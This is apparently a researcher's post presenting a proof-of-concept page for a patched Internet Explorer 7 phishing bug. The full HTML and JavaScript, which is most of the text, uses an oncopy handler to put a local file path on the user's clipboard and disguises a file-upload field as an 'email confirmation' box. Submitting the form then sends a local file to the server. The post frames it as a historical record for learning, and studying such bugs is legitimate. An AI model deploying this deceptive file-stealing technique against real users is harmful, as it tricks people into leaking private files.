Phishing Files - Needs User Interaction

A variation of the clipboard phishing technique that works without the RefEdit ActiveX — instead it intercepts the oncopy event and temporarily swaps the text in the input field before the clipboard is written. The user copies what appears to be their email address, but the clipboard ends up with a file path. Pasting it into the second field (which is secretly a file input) and submitting the form sends the file to the server.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Phishing Files with IE7 - Variation of the Phishiing RefEditControl</title></head>
<body>
<form action="getfile.asp" target="submitFrame" method="post" zonsubmit="return false;" enctype="multipart/form-data">
<div style="position:absolute;top:10px;left:10px;">
	<div style="position:absolute;top:0px;left:0px;width:400px;height:120px;border:ridge;"></div>
	<div style="position:absolute;top:0px;left:0px;width:160px;height:300px;">
		<input tabindex=1 oncopy="changeClipBoardData();" type="text" id="iText" style="width:151px;position:absolute;top:10px;left:10px;">
		<input tabindex=2 onpaste="hideInputFileAndShowInputText();" type="file" name="fileUpload" id="iFile" style="width:240px;position:absolute;top:40px;left:10px;">
		<input type="text" id="iFakeFile" style="visibility:hidden;width:151px;position:absolute;top:40px;left:10px;">

	</div>
	<div id="daCover" style="position:absolute;top:10px;left:168px;width:200px;height:100px;background-Color:#ffffff">
		<span style="position:absolute;top:2px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Enter your E-Mail address</span>
		<span style="position:absolute;top:32px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Confirm Your E-Mail Address</span>
	</div>
	<input type="submit" onclick="showTheRealThing();" style="position:absolute;top:90px;left:120px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">
</div>
</form>
<br><br><br><br><br><br>
<iframe style="position:absolute;top:10px;left:440px;width:300px;height:120px;" name="submitFrame"></iframe>
<script language="JavaScript">
var bUserFooled = false;
var oldValue;
function changeClipBoardData()
{
	oldValue = document.all.iText.value;
	document.all.iText.value = "C:\\Windows\\System32\\sol.exe";
	setTimeout("document.all.iText.value = oldValue",0);
}
function hideInputFileAndShowInputText()
{
	bUserFooled = true;
	document.all.iFile.style.visibility='hidden';
	document.all.iFakeFile.style.visibility='visible';
	document.all.iFakeFile.focus();
	document.all.iFakeFile.value=document.all.iText.value;
}
function showTheRealThing()
{
	if (!bUserFooled)
	{
		alert("This time the Phishing did not work. To make it work, the user should copy the text from the first inputBox and paste it in the second one.");
	}
	document.all.iFile.style.visibility='visible';
	document.all.explanation.style.visibility='visible';
	document.all.iFile.style.width='350px';
	document.all.daCover.style.visibility='hidden';
	document.all.iText.style.visibility='hidden';
	document.all.iFakeFile.style.visibility='hidden';
}
</script>
</body>
</html>

The oncopy handler briefly swaps the input value to the file path (C:\Windows\System32\sol.exe), which gets copied to the clipboard, then immediately restores the original text — too fast for the user to notice. When the user pastes into the second field, the file path lands in the hidden file input. The onpaste handler then swaps the visible UI to show a plain text input containing the paste value, masking the actual file input from view.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.